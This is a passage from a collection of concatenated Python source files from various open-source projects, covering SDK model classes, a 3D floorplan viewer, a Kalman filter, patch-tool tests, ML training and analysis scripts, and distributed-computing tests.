return None
o = RequestExtShopItem()
if 'brand_code' in d:
o.brand_code = d['brand_code']
if 'category_code' in d:
o.category_code = d['category_code']
if 'description' in d:
o.description = d['description']
if 'item_code' in d:
o.item_code = d['item_code']
if 'kb_shop_id' in d:
o.kb_shop_id = d['kb_shop_id']
if 'price' in d:
o.price = d['price']
if 'title' in d:
o.title = d['title']
return o
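# Illustrative usage sketch (not part of the generated SDK): round-trip an item
# through the dict helpers defined above; the field values are made-up examples.
if __name__ == "__main__":
    item = RequestExtShopItem()
    item.item_code = "ITEM-001"
    item.title = "Sample item"
    item.price = "9.99"
    as_dict = item.to_alipay_dict()
    restored = RequestExtShopItem.from_alipay_dict(as_dict)
    print(json.dumps(as_dict), restored.title)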
|
rendering/viewer.py | MTKat/FloorplanTransformation | 323 | 15932 | from math import pi, sin, cos
from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from floorplan import Floorplan
import numpy as np
import random
import copy
class Viewer(ShowBase):
def __init__(self):
ShowBase.__init__(self)
#self.scene = self.loader.loadModel("floorplan_1.txt-floor.obj")
#self.scene = base.loader.loadModel("floorplan_1.txt-floor.egg")
#self.scene = base.loader.loadModel("panda.egg")
#self.scene = base.loader.loadModel("environment")
base.setBackgroundColor(0, 0, 0)
self.angle = 0.0
lens = PerspectiveLens()
lens.setFov(60)
lens.setNear(0.01)
lens.setFar(100000)
base.cam.node().setLens(lens)
floorplan = Floorplan('test/floorplan_7')
#floorplan.setFilename('test/floorplan_2')
floorplan.read()
self.scene = floorplan.generateEggModel()
self.scene.reparentTo(self.render)
#self.scene.setScale(0.01, 0.01, 0.01)
#self.scene.setTwoSided(True)
self.scene.setTwoSided(True)
#self.scene.setPos(0, 0, 3)
#texture = loader.loadTexture("floorplan_1.png")
#self.scene.setTexture(texture)
#self.scene.setHpr(0, 0, 0)
# angleDegrees = 0
# angleRadians = angleDegrees * (pi / 180.0)
# self.camera.setPos(20 * sin(angleRadians), -20 * cos(angleRadians), 3)
# self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.alight = AmbientLight('alight')
self.alight.setColor(VBase4(0.2, 0.2, 0.2, 1))
self.alnp = self.render.attachNewNode(self.alight)
self.render.setLight(self.alnp)
dlight = DirectionalLight('dlight')
dlight.setColor(VBase4(1, 1, 1, 1))
dlnp = self.render.attachNewNode(dlight)
#dlnp.setHpr(0, -90, 0)
dlnp.setPos(0.5, 0.5, 3)
dlnp.lookAt(0.5, 0.5, 2)
self.render.setLight(dlnp)
for i in xrange(10):
plight = PointLight('plight')
plight.setAttenuation((1, 0, 1))
color = random.randint(10, 15)
plight.setColor(VBase4(color, color, color, 1))
plnp = self.render.attachNewNode(plight)
if i == 0:
plnp.setPos(0.5, 0.5, 3)
else:
plnp.setPos(1 * random.random(), 1 * random.random(), 0.3)
pass
self.render.setLight(plnp)
#base.useTrackball()
#base.trackball.node().setPos(2.0, 0, 3)
#base.trackball.node().setHpr(0, 0, 3)
#base.enableMouse()
#base.useDrive()
base.disableMouse()
self.taskMgr.add(self.spinCameraTask, "SpinCameraTask")
#self.accept('arrow_up', self.moveForward)
#self.accept('arrow_up_-repeat', self.moveForward)
self.topDownCameraPos = [0.5, 0.5, 1.5]
self.topDownTarget = [0.5, 0.499, 0.5]
self.topDownH = 0
self.startCameraPos = floorplan.startCameraPos
self.startTarget = floorplan.startTarget
self.startH = 0
self.cameraPos = self.topDownCameraPos
self.target = self.topDownTarget
self.H = self.topDownH
self.accept('space', self.openDoor)
self.accept('enter', self.startChangingView)
self.viewMode = 'T'
self.viewChangingProgress = 1.02
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
return
def moveForward(self):
self.cameraPos[0] -= 0.1
def openDoor(self):
minDistance = 10000
doors = self.scene.find("**/doors")
for door in doors.getChildren():
mins, maxs = door.getTightBounds()
vec_1 = (mins + maxs) / 2 - Vec3(self.target[0], self.target[1], (mins[2] + maxs[2]) / 2)
vec_2 = (mins + maxs) / 2 - Vec3(self.cameraPos[0], self.cameraPos[1], (mins[2] + maxs[2]) / 2)
if (vec_1.dot(vec_2) > 0 and vec_1.length() > vec_2.length()) or np.arccos(abs(vec_1.dot(vec_2)) / (vec_1.length() * vec_2.length())) > np.pi / 4:
continue
distance = pow(pow(self.cameraPos[0] - (mins[0] + maxs[0]) / 2, 2) + pow(self.cameraPos[1] - (mins[1] + maxs[1]) / 2, 2) + pow(self.cameraPos[2] - (mins[2] + maxs[2]) / 2, 2), 0.5)
if distance < minDistance:
minDistanceDoor = door
minDistance = distance
pass
continue
if minDistance > 1:
return
mins, maxs = minDistanceDoor.getTightBounds()
if abs(maxs[0] - mins[0]) > abs(maxs[1] - mins[1]):
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]), mins[1], mins[2])
maxsExpected = Vec3(mins[0], mins[1] + (maxs[0] - mins[0]), maxs[2])
else:
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]) + (maxs[0] - mins[0]), mins[1] - (maxs[0] - mins[0]), mins[2])
maxsExpected = Vec3(mins[0] + (maxs[0] - mins[0]), mins[1] + (maxs[0] - mins[0]) - (maxs[0] - mins[0]), maxs[2])
pass
minDistanceDoor.setH(minDistanceDoor, 90)
mins, maxs = minDistanceDoor.getTightBounds()
minDistanceDoor.setPos(minDistanceDoor, minsExpected[1] - mins[1], -minsExpected[0] + mins[0], 0)
#print(scene.findAllMatches('doors'))
return
def startChangingView(self):
self.viewChangingProgress = 0
self.prevCameraPos = copy.deepcopy(self.cameraPos)
self.prevTarget = copy.deepcopy(self.target)
self.prevH = self.camera.getR()
if self.viewMode == 'T':
self.newCameraPos = self.startCameraPos
self.newTarget = self.startTarget
self.newH = self.startH
self.viewMode = 'C'
else:
self.newCameraPos = self.topDownCameraPos
self.newTarget = self.topDownTarget
self.newH = self.topDownH
self.startCameraPos = copy.deepcopy(self.cameraPos)
self.startTarget = copy.deepcopy(self.target)
self.startH = self.camera.getR()
self.viewMode = 'T'
pass
return
def changeView(self):
self.cameraPos = []
self.target = []
for c in xrange(3):
self.cameraPos.append(self.prevCameraPos[c] + (self.newCameraPos[c] - self.prevCameraPos[c]) * self.viewChangingProgress)
self.target.append(self.prevTarget[c] + (self.newTarget[c] - self.prevTarget[c]) * self.viewChangingProgress)
continue
self.H = self.prevH + (self.newH - self.prevH) * self.viewChangingProgress
if self.viewChangingProgress + 0.02 >= 1 and self.viewMode == 'C':
ceiling = self.scene.find("**/ceiling")
ceiling.show()
pass
if self.viewChangingProgress <= 0.02 and self.viewMode == 'T':
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
pass
return
def spinCameraTask(self, task):
#print(task.time)
#angleDegrees = task.time * 6.0
movementStep = 0.003
if self.viewChangingProgress <= 1.01:
self.changeView()
self.viewChangingProgress += 0.02
pass
if base.mouseWatcherNode.is_button_down('w'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] += step
self.target[c] += step
continue
pass
if base.mouseWatcherNode.is_button_down('s'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] -= step
self.target[c] -= step
continue
pass
if base.mouseWatcherNode.is_button_down('a'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] += step
self.target[1] += step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] -= step
self.target[0] -= step
pass
if base.mouseWatcherNode.is_button_down('d'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] -= step
self.target[1] -= step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] += step
self.target[0] += step
pass
rotationStep = 0.02
if base.mouseWatcherNode.is_button_down('arrow_left'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle += rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_right'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle -= rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_up'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle += rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_down'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle -= rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
angleDegrees = self.angle
angleRadians = angleDegrees * (pi / 180.0)
#self.camera.setPos(2.0 * sin(angleRadians), -2.0 * cos(angleRadians), 3)
self.camera.setPos(self.cameraPos[0], self.cameraPos[1], self.cameraPos[2])
#self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.camera.lookAt(self.target[0], self.target[1], self.target[2])
self.camera.setR(self.H)
#if base.mouseWatcherNode.hasMouse()
return Task.cont
app = Viewer()
app.run()
|
common/kalman/simple_kalman_old.py | 919bot/Tessa | 114 | 15934 | import numpy as np
class KF1D:
# this EKF assumes constant covariance matrix, so calculations are much simpler
# the Kalman gain also needs to be precomputed using the control module
def __init__(self, x0, A, C, K):
self.x = x0
self.A = A
self.C = C
self.K = K
self.A_K = self.A - np.dot(self.K, self.C)
# K matrix needs to be pre-computed as follow:
# import control
# (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R)
# self.K = np.transpose(K)
def update(self, meas):
self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas)
return self.x
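# Illustrative usage sketch (an assumption, not part of the original file): a tiny
# position/velocity filter with hand-picked matrices. In practice A, C and the
# pre-computed Kalman gain K come from the specific model, as the comment above notes.
if __name__ == "__main__":
    dt = 0.01
    A = np.array([[1.0, dt], [0.0, 1.0]])  # constant-velocity state transition
    C = np.array([[1.0, 0.0]])             # only position is measured
    K = np.array([[0.12], [0.32]])         # stand-in values for a gain from control.dare
    kf = KF1D(x0=np.array([[0.0], [0.0]]), A=A, C=C, K=K)
    state = None
    for meas in [0.1, 0.2, 0.35]:
        state = kf.update(meas)
    print(state)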
|
boot/rpi/tools/patman/func_test.py | yodaos-project/yodaos | 1,144 | 15936 | <filename>boot/rpi/tools/patman/func_test.py
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: GPL-2.0+
#
# Copyright 2017 Google, Inc
#
import contextlib
import os
import re
import shutil
import sys
import tempfile
import unittest
import gitutil
import patchstream
import settings
@contextlib.contextmanager
def capture():
import sys
from cStringIO import StringIO
oldout,olderr = sys.stdout, sys.stderr
try:
out=[StringIO(), StringIO()]
sys.stdout,sys.stderr = out
yield out
finally:
sys.stdout,sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='patman.')
def tearDown(self):
shutil.rmtree(self.tmpdir)
@staticmethod
def GetPath(fname):
return os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),
'test', fname)
@classmethod
def GetText(self, fname):
return open(self.GetPath(fname)).read()
@classmethod
def GetPatchName(self, subject):
fname = re.sub('[ :]', '-', subject)
return fname.replace('--', '-')
def CreatePatchesForTest(self, series):
cover_fname = None
fname_list = []
for i, commit in enumerate(series.commits):
clean_subject = self.GetPatchName(commit.subject)
src_fname = '%04d-%s.patch' % (i + 1, clean_subject[:52])
fname = os.path.join(self.tmpdir, src_fname)
shutil.copy(self.GetPath(src_fname), fname)
fname_list.append(fname)
if series.get('cover'):
src_fname = '0000-cover-letter.patch'
cover_fname = os.path.join(self.tmpdir, src_fname)
fname = os.path.join(self.tmpdir, src_fname)
shutil.copy(self.GetPath(src_fname), fname)
return cover_fname, fname_list
def testBasic(self):
"""Tests the basic flow of patman
        This creates a series from some hard-coded patches built from a simple
tree with the following metadata in the top commit:
Series-to: u-boot
Series-prefix: RFC
Series-cc: <NAME> <<EMAIL>>
Cover-letter-cc: Lord Mëlchett <<EMAIL>>
Series-version: 2
Series-changes: 4
- Some changes
Cover-letter:
test: A test patch series
This is a test of how the cover
leter
works
END
and this in the first commit:
Series-notes:
some notes
about some things
from the first commit
END
Commit-notes:
Some notes about
the first commit
END
with the following commands:
git log -n2 --reverse >/path/to/tools/patman/test/test01.txt
git format-patch --subject-prefix RFC --cover-letter HEAD~2
mv 00* /path/to/tools/patman/test
It checks these aspects:
- git log can be processed by patchstream
- emailing patches uses the correct command
- CC file has information on each commit
- cover letter has the expected text and subject
- each patch has the correct subject
- dry-run information prints out correctly
- unicode is handled correctly
- Series-to, Series-cc, Series-prefix, Cover-letter
- Cover-letter-cc, Series-version, Series-changes, Series-notes
- Commit-notes
"""
process_tags = True
ignore_bad_tags = True
stefan = u'<NAME> <<EMAIL>>'
rick = '<NAME> <<EMAIL>>'
mel = u'<NAME> <<EMAIL>>'
ed = u'Lond Edmund Blackaddër <<EMAIL>'
fred = '<NAME> <<EMAIL>>'
add_maintainers = [stefan, rick]
dry_run = True
in_reply_to = mel
count = 2
settings.alias = {
'fdt': ['simon'],
'u-boot': ['<EMAIL>'],
'simon': [ed],
'fred': [fred],
}
text = self.GetText('test01.txt')
series = patchstream.GetMetaDataForTest(text)
cover_fname, args = self.CreatePatchesForTest(series)
with capture() as out:
patchstream.FixPatches(series, args)
if cover_fname and series.get('cover'):
patchstream.InsertCoverLetter(cover_fname, series, count)
series.DoChecks()
cc_file = series.MakeCcFile(process_tags, cover_fname,
not ignore_bad_tags, add_maintainers,
None)
cmd = gitutil.EmailPatches(series, cover_fname, args,
dry_run, not ignore_bad_tags, cc_file,
in_reply_to=in_reply_to, thread=None)
series.ShowActions(args, cmd, process_tags)
cc_lines = open(cc_file).read().splitlines()
os.remove(cc_file)
lines = out[0].splitlines()
#print '\n'.join(lines)
self.assertEqual('Cleaned %s patches' % len(series.commits), lines[0])
self.assertEqual('Change log missing for v2', lines[1])
self.assertEqual('Change log missing for v3', lines[2])
self.assertEqual('Change log for unknown version v4', lines[3])
self.assertEqual("Alias 'pci' not found", lines[4])
self.assertIn('Dry run', lines[5])
self.assertIn('Send a total of %d patches' % count, lines[7])
line = 8
for i, commit in enumerate(series.commits):
self.assertEqual(' %s' % args[i], lines[line + 0])
line += 1
while 'Cc:' in lines[line]:
line += 1
self.assertEqual('To: <EMAIL>', lines[line])
self.assertEqual('Cc: %s' % stefan.encode('utf-8'), lines[line + 1])
self.assertEqual('Version: 3', lines[line + 2])
self.assertEqual('Prefix:\t RFC', lines[line + 3])
self.assertEqual('Cover: 4 lines', lines[line + 4])
line += 5
self.assertEqual(' Cc: %s' % mel.encode('utf-8'), lines[line + 0])
self.assertEqual(' Cc: %s' % rick, lines[line + 1])
self.assertEqual(' Cc: %s' % fred, lines[line + 2])
self.assertEqual(' Cc: %s' % ed.encode('utf-8'), lines[line + 3])
expected = ('Git command: git send-email --annotate '
'--in-reply-to="%s" --to "<EMAIL>" '
'--cc "%s" --cc-cmd "%s --cc-cmd %s" %s %s'
% (in_reply_to, stefan, sys.argv[0], cc_file, cover_fname,
' '.join(args))).encode('utf-8')
line += 4
self.assertEqual(expected, lines[line])
self.assertEqual(('%s %s, %s' % (args[0], rick, stefan))
.encode('utf-8'), cc_lines[0])
self.assertEqual(('%s %s, %s, %s, %s' % (args[1], fred, rick, stefan,
ed)).encode('utf-8'), cc_lines[1])
expected = '''
This is a test of how the cover
leter
works
some notes
about some things
from the first commit
Changes in v4:
- Some changes
<NAME> (2):
pci: Correct cast for sandbox
fdt: Correct cast for sandbox in fdtdec_setup_memory_size()
cmd/pci.c | 3 ++-
fs/fat/fat.c | 1 +
lib/efi_loader/efi_memory.c | 1 +
lib/fdtdec.c | 3 ++-
4 files changed, 6 insertions(+), 2 deletions(-)
--\x20
2.7.4
'''
lines = open(cover_fname).read().splitlines()
#print '\n'.join(lines)
self.assertEqual(
'Subject: [RFC PATCH v3 0/2] test: A test patch series',
lines[3])
self.assertEqual(expected.splitlines(), lines[7:])
for i, fname in enumerate(args):
lines = open(fname).read().splitlines()
#print '\n'.join(lines)
subject = [line for line in lines if line.startswith('Subject')]
self.assertEqual('Subject: [RFC %d/%d]' % (i + 1, count),
subject[0][:18])
if i == 0:
# Check that we got our commit notes
self.assertEqual('---', lines[17])
self.assertEqual('Some notes about', lines[18])
self.assertEqual('the first commit', lines[19])
|
checkov/common/comment/enum.py | antonblr/checkov | 4,013 | 15941 | import re
COMMENT_REGEX = re.compile(r'(checkov:skip=|bridgecrew:skip=) *([A-Z_\d]+)(:[^\n]+)?')
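# Illustrative check (not part of checkov itself): the regex above captures the
# skip prefix, the check id and an optional ":reason" suffix from a suppression
# comment. The sample comment below is made up.
if __name__ == "__main__":
    sample = "# checkov:skip=CKV_AWS_20:The bucket is intentionally public"
    match = COMMENT_REGEX.search(sample)
    if match:
        print(match.group(2))  # CKV_AWS_20
        print(match.group(3))  # :The bucket is intentionally public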
|
moabb/analysis/__init__.py | plcrodrigues/moabb | 321 | 15991 | <filename>moabb/analysis/__init__.py
import logging
import os
import platform
from datetime import datetime
from moabb.analysis import plotting as plt
from moabb.analysis.meta_analysis import ( # noqa: E501
compute_dataset_statistics,
find_significant_differences,
)
from moabb.analysis.results import Results # noqa: F401
log = logging.getLogger(__name__)
def analyze(results, out_path, name="analysis", plot=False):
"""Analyze results.
Given a results dataframe, generates a folder with
results and a dataframe of the exact data used to generate those results,
    as well as introspection to record information about the computer.
    Parameters
    ----------
    out_path: location to store the analysis folder
    results: DataFrame generated from a Results object
    name: name of the analysis subfolder (default: "analysis")
    plot: whether to plot results
"""
# input checks #
if not isinstance(out_path, str):
raise ValueError("Given out_path argument is not string")
elif not os.path.isdir(out_path):
raise IOError("Given directory does not exist")
else:
analysis_path = os.path.join(out_path, name)
unique_ids = [plt._simplify_names(x) for x in results.pipeline.unique()]
simplify = True
print(unique_ids)
print(set(unique_ids))
if len(unique_ids) != len(set(unique_ids)):
log.warning("Pipeline names are too similar, turning off name shortening")
simplify = False
os.makedirs(analysis_path, exist_ok=True)
# TODO: no good cross-platform way of recording CPU info?
with open(os.path.join(analysis_path, "info.txt"), "a") as f:
dt = datetime.now()
f.write("Date: {:%Y-%m-%d}\n Time: {:%H:%M}\n".format(dt, dt))
f.write("System: {}\n".format(platform.system()))
f.write("CPU: {}\n".format(platform.processor()))
results.to_csv(os.path.join(analysis_path, "data.csv"))
stats = compute_dataset_statistics(results)
stats.to_csv(os.path.join(analysis_path, "stats.csv"))
P, T = find_significant_differences(stats)
if plot:
fig, color_dict = plt.score_plot(results)
fig.savefig(os.path.join(analysis_path, "scores.pdf"))
fig = plt.summary_plot(P, T, simplify=simplify)
fig.savefig(os.path.join(analysis_path, "ordering.pdf"))
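# Illustrative call (assumption: `results` is the DataFrame produced by a moabb
# evaluation through the Results class imported above):
#
#   analyze(results, out_path="./benchmarks", name="my_analysis", plot=True)
#
# This writes data.csv, stats.csv and info.txt into ./benchmarks/my_analysis,
# plus scores.pdf and ordering.pdf when plot=True.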
|
tools/add_new_quantization_parameters.py | xiao1228/nncf | 310 | 16000 | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from argparse import ArgumentParser
from typing import NamedTuple, Any
import torch
from os import listdir, makedirs
from os.path import isfile, join, exists
from shutil import copyfile
from nncf.torch.quantization.layers import SymmetricQuantizer, AsymmetricQuantizer
class ParameterToAdd(NamedTuple):
name: str
value: Any
def main(argv):
parser = ArgumentParser()
parser.add_argument('-i', '--input-folder', help='Path to directory with given checkpoints to modify',
required=True)
parser.add_argument('-o', '--output-folder', help='Path to directory to save modified checkpoints', required=True)
parser.add_argument('-b', '--bitwidth', help='Bitwidth to initialize quantizer',
required=False, default=8, type=int)
parser.add_argument('-v', '--verbose', help='Print all new names of parameters', required=False,
action='store_true')
args = parser.parse_args(args=argv)
src_dir = args.input_folder
dst_dir = args.output_folder
if not exists(dst_dir):
makedirs(dst_dir)
param_list = [ParameterToAdd('_num_bits', torch.IntTensor([args.bitwidth])),
ParameterToAdd('enabled', torch.IntTensor([1]))]
pth_files = [(join(src_dir, f), join(dst_dir, f)) for f in listdir(src_dir) if
isfile(join(src_dir, f)) and ('.pth' in f or '.sd' in f)]
files_to_copy = []
for pair in pth_files:
src_file, dst_file = pair
if 'binarization' in src_file:
files_to_copy.append(pair)
continue
sd = pth = torch.load(src_file)
if 'state_dict' in pth:
sd = pth['state_dict']
hooks = [SymmetricQuantizer.SCALE_PARAM_NAME, AsymmetricQuantizer.INPUT_LOW_PARAM_NAME]
new_keys = {}
for new_parameter in param_list:
old_keys = list(sd.keys())
for k in sd.keys():
for h in hooks:
new_key = k.replace(h, new_parameter.name)
if ('.' + h in k) and ('.' + new_parameter.name not in k) and (new_key not in old_keys):
new_keys[new_key] = new_parameter.value
if new_keys:
print(f'\nAdding #{len(new_keys)} of new keys')
if args.verbose:
print('New keys:', new_keys, sep='\n')
for new_key, value in new_keys.items():
sd[new_key] = value
pth['state_dict'] = sd
torch.save(pth, dst_file)
else:
files_to_copy.append(pair)
for src_file, dst_file in files_to_copy:
print("\nCopying {}".format(dst_file))
copyfile(src_file, dst_file)
if __name__ == '__main__':
main(sys.argv[1:])
|
examples/passage_ranking.py | skirdey/FARM | 1,551 | 16018 | # fmt: off
import logging
from pathlib import Path
from farm.data_handler.data_silo import DataSilo
from farm.data_handler.processor import RegressionProcessor, TextPairClassificationProcessor
from farm.experiment import initialize_optimizer
from farm.infer import Inferencer
from farm.modeling.adaptive_model import AdaptiveModel
from farm.modeling.language_model import LanguageModel
from farm.modeling.prediction_head import RegressionHead, TextClassificationHead
from farm.modeling.tokenization import Tokenizer
from farm.train import Trainer
from farm.utils import set_all_seeds, MLFlowLogger, initialize_device_settings, reformat_msmarco_train, reformat_msmarco_dev, write_msmarco_results
from farm.evaluation.msmarco_passage_farm import msmarco_evaluation
def text_pair_classification():
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO)
ml_logger = MLFlowLogger(tracking_uri="https://public-mlflow.deepset.ai/")
ml_logger.init_experiment(experiment_name="Public_FARM", run_name="Run_text_pair_classification")
##########################
########## Settings
##########################
set_all_seeds(seed=42)
device, n_gpu = initialize_device_settings(use_cuda=True)
n_epochs = 2
batch_size = 64
evaluate_every = 500
lang_model = "bert-base-cased"
label_list = ["0", "1"]
train_filename = "train.tsv"
dev_filename = "dev_200k.tsv"
# The source data can be found here https://github.com/microsoft/MSMARCO-Passage-Ranking
generate_data = False
data_dir = Path("../data/msmarco_passage")
predictions_raw_filename = "predictions_raw.txt"
predictions_filename = "predictions.txt"
train_source_filename = "triples.train.1m.tsv"
qrels_filename = "qrels.dev.tsv"
queries_filename = "queries.dev.tsv"
passages_filename = "collection.tsv"
top1000_filename = "top1000.dev"
# 0. Preprocess and save MSMarco data in a format that can be ingested by FARM models. Only needs to be done once!
# The final format is a tsv file with 3 columns (text, text_b and label)
if generate_data:
reformat_msmarco_train(data_dir / train_source_filename,
data_dir / train_filename)
reformat_msmarco_dev(data_dir / queries_filename,
data_dir / passages_filename,
data_dir / qrels_filename,
data_dir / top1000_filename,
data_dir / dev_filename)
# 1.Create a tokenizer
tokenizer = Tokenizer.load(
pretrained_model_name_or_path=lang_model,
do_lower_case=False)
# 2. Create a DataProcessor that handles all the conversion from raw text into a pytorch Dataset
# Evaluation during training will be performed on a slice of the train set
# We will be using the msmarco dev set as our final evaluation set
processor = TextPairClassificationProcessor(tokenizer=tokenizer,
label_list=label_list,
metric="f1_macro",
train_filename=train_filename,
test_filename=None,
dev_split=0.001,
max_seq_len=128,
data_dir=data_dir,
delimiter="\t")
# 3. Create a DataSilo that loads several datasets (train/dev/test), provides DataLoaders for them and calculates a few descriptive statistics of our datasets
data_silo = DataSilo(
processor=processor,
batch_size=batch_size)
# 4. Create an AdaptiveModel
# a) which consists of a pretrained language model as a basis
language_model = LanguageModel.load(lang_model)
# b) and a prediction head on top that is suited for our task
prediction_head = TextClassificationHead(num_labels=len(label_list),
class_weights=data_silo.calculate_class_weights(
task_name="text_classification"),
)
model = AdaptiveModel(
language_model=language_model,
prediction_heads=[prediction_head],
embeds_dropout_prob=0.1,
lm_output_types=["per_sequence_continuous"],
device=device)
# 5. Create an optimizer
model, optimizer, lr_schedule = initialize_optimizer(
model=model,
learning_rate=1e-5,
device=device,
n_batches=len(data_silo.loaders["train"]),
n_epochs=n_epochs)
    # 6. Feed everything to the Trainer, which takes care of growing our model into a powerful plant and evaluates it from time to time
trainer = Trainer(
model=model,
optimizer=optimizer,
data_silo=data_silo,
epochs=n_epochs,
n_gpu=n_gpu,
lr_schedule=lr_schedule,
evaluate_every=evaluate_every,
device=device)
# 7. Let it grow
trainer.train()
# 8. Hooray! You have a model. Store it:
save_dir = Path("saved_models/passage_ranking_model")
model.save(save_dir)
processor.save(save_dir)
# 9. Load it & harvest your fruits (Inference)
# Add your own text adapted to the dataset you provide
model = Inferencer.load(save_dir, gpu=True, max_seq_len=128, batch_size=128)
result = model.inference_from_file(data_dir / dev_filename)
write_msmarco_results(result, save_dir / predictions_raw_filename)
msmarco_evaluation(preds_file=save_dir / predictions_raw_filename,
dev_file=data_dir / dev_filename,
qrels_file=data_dir / qrels_filename,
output_file=save_dir / predictions_filename)
model.close_multiprocessing_pool()
if __name__ == "__main__":
text_pair_classification()
# fmt: on
|
tests/ignite/distributed/comp_models/test_native.py | Eunjnnn/ignite | 4,119 | 16022 | import os
import pytest
import torch
import torch.distributed as dist
from ignite.distributed.comp_models import has_native_dist_support
if not has_native_dist_support:
pytest.skip("Skip if no native dist support", allow_module_level=True)
else:
from ignite.distributed.comp_models.native import _expand_hostlist, _NativeDistModel, _setup_ddp_vars_from_slurm_env
# tests from https://github.com/LLNL/py-hostlist/blob/master/hostlist/unittest_hostlist.py
@pytest.mark.parametrize(
"hostlist, expected",
[
("localhost", "localhost"),
("compute!:b24_[1-2].r", "compute!:b24_1.r,compute!:b24_2.r"),
("quartz[4-8]", "quartz4,quartz5,quartz6,quartz7,quartz8"),
("c1001a-[11,17]", "c1001a-11,c1001a-17"),
("c1001a-s[11,17]", "c1001a-s11,c1001a-s17"),
("c1009a-s17,c1010a-s11", "c1009a-s17,c1010a-s11"),
(
"gpu-compute-on-demand-dy-g4dnxlarge-[1-4]",
"gpu-compute-on-demand-dy-g4dnxlarge-1,"
"gpu-compute-on-demand-dy-g4dnxlarge-2,"
"gpu-compute-on-demand-dy-g4dnxlarge-3,"
"gpu-compute-on-demand-dy-g4dnxlarge-4",
),
(
"node[18-19,1-16,21-22]",
"node1,node2,node3,node4,node5,"
"node6,node7,node8,node9,node10,"
"node11,node12,node13,node14,node15,"
"node16,node18,node19,node21,node22",
),
(
"node[4-8,12,16-20,22,24-26]",
"node4,node5,node6,node7,node8,"
"node12,node16,node17,node18,"
"node19,node20,node22,node24,"
"node25,node26",
),
("machine2-[02-4]vm1", "machine2-02vm1,machine2-03vm1,machine2-04vm1"),
(
"machine2-[02-3]vm1, machine4-[0003-5].vml2",
"machine2-02vm1,machine2-03vm1,machine4-0003.vml2,machine4-0004.vml2,machine4-0005.vml2",
),
("machine2-[009-11]vm1", "machine2-009vm1,machine2-010vm1,machine2-011vm1"),
("node[1,2,3]", "node1,node2,node3"),
(
"compute-b24-[1-3,5-9], compute-b25-[1,4,8],compute-b25-[2-9,13]",
"compute-b24-1,compute-b24-2,compute-b24-3,compute-b24-5,compute-b24-6,"
"compute-b24-7,compute-b24-8,compute-b24-9,compute-b25-1,compute-b25-4,"
"compute-b25-8,compute-b25-2,compute-b25-3,compute-b25-4,compute-b25-5,"
"compute-b25-6,compute-b25-7,compute-b25-8,compute-b25-9,compute-b25-13",
),
],
)
def test_expand_hostlist(hostlist, expected):
assert _expand_hostlist(hostlist) == expected.split(",")
def test_expand_hostlist_invalid():
with pytest.raises(ValueError, match=r"hostlist invalid"):
_expand_hostlist("invalid[]")
@pytest.mark.distributed
def test__native_dist_model():
available_backends = _NativeDistModel.available_backends
if dist.is_nccl_available():
assert "nccl" in available_backends
else:
assert "nccl" not in available_backends
if dist.is_gloo_available():
assert "gloo" in available_backends
else:
assert "gloo" not in available_backends
if dist.is_mpi_available():
assert "mpi" in available_backends
else:
assert "mpi" not in available_backends
with pytest.raises(ValueError, match=r"Backend should be one of"):
_NativeDistModel.create_from_backend("abc")
@pytest.mark.distributed
@pytest.mark.skipif(not dist.is_nccl_available(), reason="Skip if nccl not available")
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_nccl_but_no_gpu(mock_gpu_is_not_available):
with pytest.raises(RuntimeError, match=r"Nccl backend is required but no cuda capable devices"):
_NativeDistModel(backend="nccl")
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_config():
import os
from datetime import timedelta
os.environ["RANK"] = "1"
with pytest.raises(RuntimeError, match=r"PyTorch distributed configuration should define env variables"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
del os.environ["RANK"]
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
